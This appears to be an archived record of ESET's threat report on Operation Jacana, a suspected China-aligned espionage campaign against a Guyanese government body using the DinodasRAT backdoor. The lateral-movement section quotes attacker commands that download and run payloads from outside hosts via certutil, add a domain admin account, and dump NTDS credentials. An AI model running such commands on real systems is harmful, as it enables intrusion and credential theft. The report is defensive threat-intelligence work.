{ "id": "131751d9-ed6f-4cdd-a2dc-97bb4ceac6db", "created_at": "2026-04-06T00:06:17.576056Z", "updated_at": "2026-04-10T03:36:33.7577Z", "deleted_at": null, "sha1_hash": "2958e9cbfcb669e800ac5a4b6c4ab6ac40cb010d", "title": "Operation Jacana: Foundling hobbits in Guyana", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 640845, "plain_text": "Operation Jacana: Foundling hobbits in Guyana\r\nBy Fernando Tavella\r\nArchived: 2026-04-05 12:42:25 UTC\r\nIn February 2023, ESET researchers detected a spearphishing campaign targeting a governmental entity in Guyana. While\r\nwe haven’t been able to link the campaign, which we named Operation Jacana, to any specific APT group, we believe with\r\nmedium confidence that a China-aligned threat group is behind this incident.\r\nIn the attack, the operators used a previously undocumented C++ backdoor that can exfiltrate files, manipulate Windows\r\nregistry keys, execute CMD commands, and more. We named the backdoor DinodasRAT based on the victim identifier it\r\nsends to its C\u0026C: the string always begins with Din, which reminded us of the hobbit Dinodas from the Lord of the Rings.\r\nKey points of this blogpost:\r\nOperation Jacana is a targeted cyberespionage campaign against a Guyanese governmental entity.\r\nAfter the initial compromise via spearphishing emails, the attackers proceeded to move laterally through\r\nthe victim’s internal network.\r\nTo extract sensitive data, the operators used a previously undocumented backdoor we named DinodasRAT.\r\nDinodasRAT encrypts the information it sends to the C\u0026C using the Tiny Encryption Algorithm (TEA).\r\nApart from DinodasRAT, the attackers also deployed Korplug, leading us to suspect that China-aligned\r\noperators are behind this operation.\r\nThis campaign was targeted, as the threat actors crafted their emails specifically to entice their chosen victim organization.\r\nAfter successfully compromising the first couple of machines with DinodasRAT, the operators proceeded to move laterally\r\nand breach the target’s internal network, where they again deployed the DinodasRAT backdoor, along with additional\r\nmalicious tools, among them a variant of Korplug (aka PlugX). The overview of the compromise flow in Operation Jacana is\r\nshown in Figure 1.\r\nFigure 1. Operation Jacana compromise flow\r\nAttribution\r\nAs of this writing, we have not been able to attribute Operation Jacana to any known group. However, thanks to a clue we\r\nfound, we feel that we aren’t completely in the dark regarding the perpetrators. During the attack, the threat actors deployed\r\na variant of Korplug (aka PlugX), which is common to China-aligned groups – for example, Mustang Panda’s Hodur: Old\r\ntricks, new Korplug variant.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 1 of 12\n\nWhile our attribution to a China-aligned threat actor is made with only medium confidence, the hypothesis is further\r\nsupported by recent developments in Guyana–China diplomatic relations. In February 2023, the same month that Operation\r\nJacana occurred, the Special Organised Crime Unit (SOCU) of Guyana arrested three people in a money laundering\r\ninvestigation involving Chinese companies, an act disputed by the local Chinese embassy. Additionally, as part of the Belt\r\nand Road Initiative, China has economic interests in Guyana. \r\nInitial Access\r\nAs the first step in breaching their victim’s network, the threat actors behind Operation Jacana sent the target organization\r\nspearphishing emails referencing Guyanese public affairs. We observed the following subject lines:\r\nPresident Mohamed Irfaan Ali's Official Visit to Nassau, The Bahamas\r\nGuyanese fugitive in Vietnam\r\nBased on the email subjects, the operators must have been following the political goings-on in Guyana – the time we\r\nregistered new detections at the targeted governmental entity coincided with the Guyanese president’s attendance of the\r\nCARICOM conference in Nassau.\r\nThe spearphishing emails contained a link that, when clicked, downloaded a ZIP file from\r\nhttps://fta.moit.gov[.]vn/file/people.zip. Since a domain ending with gov.vn indicates a Vietnamese governmental website,\r\nwe believe that the operators were able to compromise another governmental entity and use it to host their malware samples.\r\nWe have notified the VNCERT about the compromised infrastructure.\r\nOnce the victim extracted the ZIP file, which wasn’t password protected, and launched the contained executable, they\r\nbecame compromised with the DinodasRAT malware. The extracted filenames are related to the phishing email subject\r\nlines:\r\nGuyanese fugitive in Vietnam20220101to20230214Guyanese fugitive in Vietnam.docx.exe\r\nThe Bahamas/President Mohamed Irfaan Ali’s Official Visit to Nassau, The Bahamas.doc.exe\r\nLateral Movement\r\nAfter breaching their target, the attackers proceeded to move across the victim’s internal network. According to our\r\ntelemetry, BAT/Impacket.M and related detections were triggered in the network, which points to the use of Impacket, or a\r\nsimilar WMI-based lateral movement tool. \r\nSome of the commands the attackers executed on the network include:\r\ncertutil -urlcache -split http://23.106.123[.]166/vmtools.rar\r\nnet user test8 Test123.. /add /do\r\nnet group \"domain admins\" test8 /add /do\r\ncertutil -urlcache -split -f http://23.106.122[.]5/windowsupdate.txt c:\\programdata\\windowsupdate.txt\r\ncd c:\\programdata\\\r\nc:\\programdata\\windowsupdate.exe\r\npowershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q\"\r\nThe last command dumps ntds.dit using the LOLBin ntdsutil.exe. This enables dumping passwords stored on a Windows\r\nserver.\r\nDinodasRAT\r\nDinodasRAT is a previously undocumented remote access trojan developed in C++ with various capabilities that allow an\r\nattacker to spy on and collect sensitive information from a victim’s computer. \r\nWhen executed, the malware first checks whether three arguments were passed. If present, these arguments must contain the\r\nfollowing information in the following order:\r\n1. the letter d,\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 2 of 12\n\n2. a number, which is a process ID, and\r\n3. a full file path.\r\nIf all three arguments were passed, DinodasRAT terminates the process represented by the process ID using the Windows\r\nAPI TerminateProcess then uses the Windows API DeleteFileW to delete the file passed in the third argument. After this, the\r\nprocess stops its execution by using the C++ standard library exit function. This is most likely intended as an uninstall\r\nfunction.\r\nIf no arguments were passed, DinodasRAT continues its execution by creating a mutex named client and checks for the\r\nexistence of the conventional Windows directory C:\\ProgramData. If it exists, the malware creates a subdirectory named\r\nApplication Doc, which is used to allocate a configuration file and other files related to the backdoor. In case the Windows\r\ndirectory doesn’t exist, DinodasRAT creates a path in the root directory called Program.Files\\Application.Doc. The strings\r\nApplication Doc, ProgramData and Program.Files\\Application.Doc are encrypted using the Tiny Encryption Algorithm\r\n(TEA).\r\nThe Application Doc directory is created with the attributes Read-only and Hidden. Inside of Application Doc, DinodasRAT\r\ncreates two subdirectories, named 0 and 1. Once the directory exists, the malware spawns three threads used for data\r\ncollection and exfiltration. A detailed description of their behavior is given in Table 1.\r\nTable 1. Thread descriptions\r\nThread Description\r\n1\r\nTake a screenshot of the display of the victim’s machine every five minutes using Windows API functions\r\nlike CreateDCW, BitBlt, DeleteDC, or ReleaseDC. The screenshot is compressed and saved in the\r\nsubdirectory Application Doc\\0.\r\nIn order to compress the screenshot, the attackers use the zlib library, version 1.2.11.\r\nThe format of the filename used for the saved screenshots is the following:\r\n\u003cYYYYMMDDHHMMSS\u003e_\u003cfive random digits\u003e_\u003cone random digit\u003e.jpg\r\n2\r\nGet the content of the clipboard every five minutes using the Windows API function GetClipboardData and\r\nsave it in the subdirectory Application Doc\\1.\r\nThe format of the filename used for the clipboard data file is the following: DateTimeStamp_\u003cfive random\r\ndigits\u003e_\u003cone random digit\u003e.txt\r\n3\r\nLoops through the subdirectories 0 and 1 and sends the filenames, encrypted with TEA and base64 encoded,\r\nto the C\u0026C server. If the C\u0026C server replies, it creates another packet in order to send the filename with its\r\ndata. Finally, it deletes the file from the victim’s machine.\r\nAfter the threads are spawned, DinodasRAT creates a file named conf.ini in the main directory. This file contains an ID used\r\nto identify the victim to the C\u0026C server. \r\nFigure 2 shows an example of the ID saved in the conf.ini file.\r\nFigure 2. Example of an ID saved in the conf.ini file\r\nThe format of the ID is Din_\u003cYYYYMMDD\u003e_\u003cMD5-HASH\u003e_\u003cRANDOM-VALUE\u003e_V1, where:\r\n\u003cYYYYMMDD\u003e is the install date,\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 3 of 12\n\n\u003cMD5-HASH\u003e is calculated using the IP address of the victim and the install date in milliseconds,\r\n\u003cRANDOM-VALUE\u003e is a random value, and\r\nV1 is probably the malware version.\r\nTEA: Tiny Encryption Algorithm\r\nDinodasRAT uses TEA to decrypt some of its strings, as well as to encrypt/decrypt data sent to, or received from, its C\u0026C\r\nserver. TEA, or Tiny Encryption Algorithm, is a simple block cipher, noted for its ease of implementation in software and\r\nhardware. For example, the original reference implementation of its encode function comprises just a few lines of C code,\r\nwith a very short setup time and no tables of preset values. DinodasRAT employs the algorithm in the cipher-block chaining\r\n(CBC) mode. In some cases, the encrypted data is further encoded with base64 before being sent to the C\u0026C server.\r\nWe found that the malware contains three different keys used for different encryption/decryption scenarios, as described in\r\nTable 2.\r\nTable 2. TEA keys used by DinodasRAT\r\nKey N Value Description\r\n1\r\nA1 A1 18 AA 10 F0 FA 16 06 71\r\nB3 08 AA AF 31 A1\r\nUsed mainly to encrypt/decrypt communications with the C\u0026C server.\r\n2\r\nA0 21 A1 FA 18 E0 C1 30 1F 9F\r\nC0 A1 A0 A6 6F B1\r\nUsed to encrypt the name of the files created in the screenshot\r\nfunctionality, before they are sent to the C\u0026C server.\r\n3\r\n11 0A A8 E1 C0 F0 FB 10 06 71\r\nF3 18 AC A0 6A AF\r\nUsed to decrypt the installation paths.\r\nIt is possible that the attackers chose to use TEA in order to make the job easier for themselves – we have reason to believe\r\nthat the malware’s implementation of the algorithm is not created from scratch, but that it could be adapted from\r\nBlackFeather’s blogpost Tea Algorithm - C++. \r\nC\u0026C communication and malicious activity\r\nIn order to communicate with the C\u0026C server, DinodasRAT uses the Winsock library to create a socket that uses the TCP\r\nprotocol. Although TCP is the default protocol used to send and receive information from the C\u0026C server, we have seen that\r\nDinodasRAT is capable of changing to the UDP protocol.\r\nThe backdoor also creates various threads for different purposes, such as manipulating a received command to execute on\r\nthe victim’s machine. Hence, in order to maintain synchronized communication, DinodasRAT makes use of Windows event\r\nobjects by using Windows API functions like CreateEventW, SetEventW, and WaitForSingleObject.\r\nTo start the main communication with the C\u0026C server, DinodasRAT sends a packet with basic information about the\r\nvictim’s machine and its configuration, such as:\r\nWindows version,\r\nOS architecture,\r\nusername,\r\nmalware execution path encoded in base64, and\r\na value used for the UDP protocol, which by default is 800.\r\nFigure 3 shows not only basic information collected about the victim, but also the ID generated by the malware, which\r\nserves as a victim identifier for the C\u0026C server.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 4 of 12\n\nFigure 3. Basic information before its encryption\r\nAll the information that DinodasRAT sends to the C\u0026C server via the TCP protocol is TEA encrypted. In addition to that,\r\nsome of the information is also base64 encoded.\r\nTo send the stolen information to the C\u0026C server, DinodasRAT crafts a packet containing the following:\r\nFirst byte: an ID possibly to indicate whether the data is TEA encrypted (0x30) or base64 encoded and TEA\r\nencrypted (0x32).\r\nNext DWORD: encrypted data size.\r\nRemaining bytes: encrypted data.\r\nFigure 4 shows an example of an encrypted packet to be sent to the C\u0026C server.\r\nFigure 4. Example of an encrypted packet\r\nDuring our analysis we were unable to obtain a response from the C\u0026C server, but we were able to determine that any\r\npackets received from the server should also be encrypted with TEA.\r\nWhen it comes to handling commands received from the C\u0026C server, DinodasRAT creates a thread with an infinite loop\r\nresponsible for receiving and determining whether packets contain encrypted commands to execute.\r\nA packet, once decrypted, contains the following structure:\r\nFirst DWORD: ID of action to perform, hex value (see Table 2).\r\nSecond DWORD: another ID, related to indicate on the client side that this packet is a command value (in hex) to\r\nexecute on the victim’s machine.\r\nRest of the packet: data used by the command to execute.\r\nDinodasRAT contains commands capable of performing various actions on a victim’s machine or on the malware itself.\r\nTable 3 lists the supported commands with a short description of each. \r\nTable 3. DinodasRAT commands\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 5 of 12\n\nCommand\r\nID\r\nDescription\r\n0x02 List the contents of a specific directory.\r\n0x03 Delete a file or the content of a directory.\r\n0x04 Change the attribute of a file to hidden or normal.\r\n0x05 Send files to the C\u0026C server.\r\n0x06 Set an event object used for command 0x05.\r\n0x08\r\nModify a binary file with bytes received from the C\u0026C server or execute a command using\r\nCreateProcessW.\r\n0x09 Set an event object used for command 0x08.\r\n0x0D Write a variable called va, with its value, in the conf.ini file.\r\n0x0E Enumerate running processes.\r\n0x0F Terminate a process by its process ID.\r\n0x10 List services on the victim’s machine.\r\n0x11 Start or delete a service.\r\n0x12 Get info from a Windows registry key.\r\n0x13 Delete a Windows registry key.\r\n0x14 Create a Windows registry key.\r\n0x15 Execute a file or a command using the CreateProcessW Windows API.\r\n0x16 Execute a command using the CreateProcessW Windows API.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 6 of 12\n\nCommand\r\nID\r\nDescription\r\n0x17 Receive a domain and execute nslookup with that domain to create another socket with the IP address.\r\n0x18\r\nReceive and execute a command using Windows APIs CreateProcessW, PeekNamedPipe, and\r\nReadFile.\r\n0x19 Same as command 0x18.\r\n0x1A Set an event object used for commands 0x18, 0x19, and 0x1B.\r\n0x1B Interactive reverse shell.\r\n0x1D File manipulation; rename, copy, move files, etc.\r\n0x1E Set the string ok to a global variable and send that value to the C\u0026C server.\r\n0x1F Write a variable called mode with its value into the conf.ini file.\r\n0x20 Write a variable called ptype with its value into the conf.ini file.\r\n0x21 Get or set a variable called fmode with its value in the conf.ini file.\r\n0x22 Terminate malware execution.\r\n0x24\r\nWrite the variables s and sub, with their respective values, into a file named p.ini. Both variables can\r\nhave a Boolean value of true or false.\r\n0x25 Configurate the event and global variables related with the take screenshot thread.\r\n0x26 Write a variable called c with its value into a file named p.ini.\r\n0x29 Modify the value of a global variable used for the UDP protocol, default value 0x800.\r\nDuring our investigation we have seen only the creation and use of the ID variable with its respective value in the conf.ini\r\nfile, which is used to indicate the victim to the C\u0026C server.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 7 of 12\n\nAdditionally, DinodasRAT makes use of a multipurpose global variable which, for example, can contain the path of a\r\nfilename to be deleted or the name of a Windows registry subkey to create.\r\nOther malware samples\r\nThe attackers also used other tools apart from DinodasRAT during the intrusion:\r\nA variant of Korplug (aka PlugX) – A backdoor typically used by China-aligned threat groups.\r\nA SoftEther VPN client. This was probably used to proxy local ports, such as RDP, to the C\u0026C server.\r\nConclusion\r\nOperation Jacana is a cyberespionage campaign that impacted a governmental entity in Guyana. We believe with medium\r\nconfidence that it was conducted by a China-aligned APT group.\r\nThe attackers used a combination of previously unknown tools, such as DinodasRAT, and more traditional backdoors such\r\nas Korplug.\r\nBased on the spearphishing emails used to gain initial access to the victim’s network, the operators are keeping track of the\r\ngeopolitical activities of their victims to increase the likelihood of their operation's success.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nA list of IoCs can also be found in our GitHub repository. \r\nFiles\r\nSHA-1 Filename ESET detection name Descr\r\n599EA9B26581EBC7B4BDFC02E6C792B6588B751E\r\nPresident Mohamed Irfaan Ali's Official\r\nVisit to Nassau, The Bahamas.doc.exe\r\nWin32/DinodasRAT.A Dinod\r\nEFD1387BB272FFE75EC9BF5C1DD614356B6D40B5 people.zip Win32/DinodasRAT.A\r\nZIP fi\r\nconta\r\nDinod\r\n9A6E803A28D27462D2DF47B52E34120FB2CF814B\r\nPresident Mohamed Irfaan Ali's Official\r\nVisit to Nassau, The Bahamas.exe\r\nWin32/DinodasRAT.B Dinod\r\n33065850B30A7C797A9F1E5B219388C6991674DB 114.exe Win32/DinodasRAT.B Dinod\r\nNetwork\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 8 of 12\n\nIP Domain Hosting provider First seen Details\r\n23.106.122[.]5 N/A\r\nLeaseweb Asia Pacific\r\npte. ltd.\r\n2023‑03‑29\r\nHosts other malicious\r\ncomponents.\r\n23.106.122[.]46 N/A IRT-LSW-SG 2023‑02‑13\r\nHosts other malicious\r\ncomponents.\r\n23.106.123[.]166 N/A\r\nLeaseweb Asia Pacific\r\npte. ltd.\r\n2023‑02‑15\r\nHosts other malicious\r\ncomponents.\r\n42.119.111[.]97 fta.moit.gov[.]vn FPT Telecom Company 2023‑02‑13\r\nHosts DinodasRAT in a\r\ncompressed file.\r\n115.126.98[.]204 N/A\r\nForewin Telecom Group\r\nLimited, ISP at, HK\r\n2023‑05‑08\r\nC\u0026C server for\r\nDinodasRAT.\r\n118.99.6[.]202 N/A Edward Poon 2023‑02‑02\r\nC\u0026C server for\r\nDinodasRAT.\r\n199.231.211[.]19\r\nupdate.microsoft-setting[.]com\r\nDash Networks Inc. 2022‑11‑07\r\nC\u0026C server for\r\nDinodasRAT.\r\nMITRE ATT\u0026CK techniques\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1583.003\r\nAcquire Infrastructure: Virtual\r\nPrivate Server\r\nOperators have used VPS servers for hosting\r\ntheir payloads.\r\nT1587.001 Develop Capabilities: Malware\r\nOperators made custom malware for the\r\noperation.\r\nT1608.001\r\nStage Capabilities: Upload\r\nMalware\r\nOperators have used servers to upload\r\nmalware.\r\nT1584.004 Compromise Infrastructure: Server\r\nOperators have compromised servers to host\r\ntheir payloads.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 9 of 12\n\nTactic ID Name Description\r\nT1588.001 Obtain Capabilities: Malware\r\nOperators have used a variant of the Korplug\r\nbackdoor in this operation.\r\nT1588.002 Obtain Capabilities: Tool\r\nOperators have used tools such as Impacket\r\nand SoftEther.\r\nInitial Access T1566.002 Phishing: Spearphishing Link\r\nOperators made use of scheduled tasks to\r\npersist their malware.\r\nExecution\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nOperators have used PowerShell to execute\r\ncommands on the victim’s network.\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows Command\r\nShell\r\nOperators have used Windows command\r\nshell to execute commands on the victim’s\r\ninternal network.\r\nT1059.005\r\nCommand and Scripting\r\nInterpreter: Visual Basic\r\nOperators have used VBScripts.\r\nT1106 Native API\r\nDinodasRAT uses APIs, e.g.,\r\nCreateProcessW, to execute CMD commands\r\non the victim’s machine.\r\nT1204.001 User Execution: Malicious Link\r\nOperators have relied on their victims to open\r\na link to download their malware.\r\nT1204.002 User Execution: Malicious File\r\nOperators have relied on their victims to\r\nexecute their malware.\r\nDefense Evasion\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nDinodasRAT compresses files before they are\r\nsent to the C\u0026C server.\r\nDinodasRAT also uses TEA to decrypt\r\nstrings.\r\nT1036.007\r\nMasquerading: Double File\r\nExtension\r\nOperators have used “double extensions” to\r\ntrick victims into executing their malware.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 10 of 12\n\nTactic ID Name Description\r\nT1070.004 Indicator Removal: File Deletion\r\nDinodasRAT is capable of self-deletion from\r\nthe victim’s machine.\r\nT1564.001\r\nHide Artifacts: Hidden Files and\r\nDirectories\r\nTo evade detection, DinodasRAT creates\r\nhidden folders.\r\nPersistence\r\nT1078.002 Valid Accounts: Domain Accounts\r\nOperators have created domain accounts to\r\nmaintain persistent access to the victim’s\r\ninternal network.\r\nT1053 Scheduled Task/Job\r\nOperators made use of scheduled tasks to\r\npersist their malware.\r\nCredential\r\nAccess\r\nT1003.003 OS Credential Dumping: NTDS\r\nOperators abused ntdsutil.exe to dump\r\ncredentials.\r\nDiscovery\r\nT1083 File and Directory Discovery\r\nDinodasRAT can list the contents of a\r\ndirectory or a file.\r\nT1012 Query Registry\r\nDinodasRAT can obtain information from\r\nWindows registry keys.\r\nT1057 Process Discovery\r\nDinodasRAT can obtain information about\r\nthe processes running on the victim’s\r\nmachine.\r\nT1007 System Service Discovery\r\nDinodasRAT can obtain information about\r\nthe services running on the victim’s machine.\r\nT1082 System Information Discovery\r\nDinodasRAT retrieves information like\r\nWindows version from the victim’s machine.\r\nCollection\r\nT1115 Clipboard Data\r\nDinodasRAT can obtain information located\r\non the clipboard of the victim’s machine.\r\nT1113 Screen Capture\r\nDinodasRAT can take screenshots on the\r\nvictim’s machine.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 11 of 12\n\nTactic ID Name Description\r\nCommand and\r\nControl\r\nT1573.001\r\nEncrypted Channel: Symmetric\r\nCryptography\r\nDinodasRAT has used TEA for encrypting\r\nC\u0026C server communications.\r\nT1095 Non-Application Layer Protocol\r\nDinodasRAT has used TCP or UDP protocols\r\nfor its connection to the C\u0026C server.\r\nT1132 Data Encoding\r\nDinodasRAT uses base64 encoding for\r\nstrings and data sent to its C\u0026C server.\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nDinodasRAT exfiltrates data over the same\r\nchannel used for its C\u0026C server.\r\nSource: https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nhttps://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/" ], "report_names": [ "operation-jacana-spying-guyana-entity" ], "threat_actors": [ { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61c3f4b4-afd9-4187-91c3-ba6dfeeb6470", "created_at": "2023-10-14T02:03:14.355977Z", "updated_at": "2026-04-10T02:00:04.811984Z", "deleted_at": null, "main_name": "Operation Jacana", "aliases": [], "source_name": "ETDA:Operation Jacana", "tools": [ "Agent.dhwf", "Destroy RAT", "DestroyRAT", "DinodasRAT", "Impacket", "Kaba", "Korplug", "PlugX", "RedDelta", "SoftEther VPN", "Sogu", "TIGERPLUG", "TVT", "Thoper", "XDealer", "Xamtrav" ], "source_id": "ETDA", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775433977, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2958e9cbfcb669e800ac5a4b6c4ab6ac40cb010d.pdf", "text": "https://archive.orkl.eu/2958e9cbfcb669e800ac5a4b6c4ab6ac40cb010d.txt", "img": "https://archive.orkl.eu/2958e9cbfcb669e800ac5a4b6c4ab6ac40cb010d.jpg" } }